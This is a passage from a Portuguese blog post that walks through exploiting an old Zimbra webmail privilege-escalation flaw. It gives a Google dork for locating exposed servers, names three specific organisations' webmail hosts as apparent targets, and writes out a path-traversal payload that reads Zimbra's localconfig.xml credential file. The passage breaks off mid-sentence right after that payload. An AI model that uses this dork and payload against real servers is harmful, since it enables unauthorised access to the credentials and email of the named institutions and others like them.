Tive algumas horas de folga esse final de semana e decidi verificar uma falha que estava nos meus favoritos, a falha é referente ao zimbra, um “gerenciador de emails” open-source utilizado por muitas empresas. Como sempre grande partes dessas empresas, corporações ou órgãos não estão nem um pouco preocupadas com sua segurança e de seus clientes ou funcionários, até ai nenhuma novidade.
O fato é que gosto de integrar um pouco as coisas e formular algumas ideias bacanas de invasão e testes, além de fazer alguns “exposeds” para as empresas “criarem vergonha na cara” hehe (Sim, algumas falhas são consertadas depois de postagens aqui no blog e fico feliz por isso).
Como já citei o zimbra é basicamente a versão livre do microsoft exchange, fazem as mesmas funções, mas um é livre e outro é pago. O zimbra por sua vez possui também uma versão comercial, o software é excelente e suas funcionalidades bem bacanas além do seu nível de segurança, mas porque estou falando dele aqui? O zimbra assim como outros softwares alguma vez na vida já tiveram falhas e pode ter outras que ainda não foram relatadas, a mais recente foi relatada final de 2013, então percebi que a maioria das empresas rodam esse software há muito tempo, reportei para algumas faculdades como a USP que seu servidor de e-mail estava vulnerável na época e eles prontamente corrigiram e agradeceram o contato.
Vários “script-kiddies” deixaram passar essa falha, mas mal eles sabem que podem ter nas mãos e-mails importantíssimos para fazer qualquer coisa. Não estou aqui para influenciar de forma errada ninguém, gosto apenas de mostrar a fragilidade que está a segurança no mundo de hoje e que qualquer um que saiba ler e interpretar pode invadir sistemas que a princípio deveriam ser seguros. Vou reproduzir um PoC da falha do zimbra e vocês ficarão espantados com a quantidade de sites importantes que o utilizam e estão desatualizados.
Primeiramente escrevi uma dork simples que pega todo site que tenha na url “webmail” e que na página tenha “zimbra”. E o resultado foi mais ou menos igual esse:
inurl: webmail & intext:zimbra
Além desses o google retornou outros resultados:
http://webmail.une.com.co/zimbra/
https://webmail.ciu.edu.tr/
https://webmail.salvador.ba.gov.br/
Até ai tudo bem, então fui na página da falha de Privilege Escalation via LFI que está a seguir: http://www.exploit-db.com/exploits/30085/
A falha diz que se eu adicionar o seguinte código na url “
LFI is located at :
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 “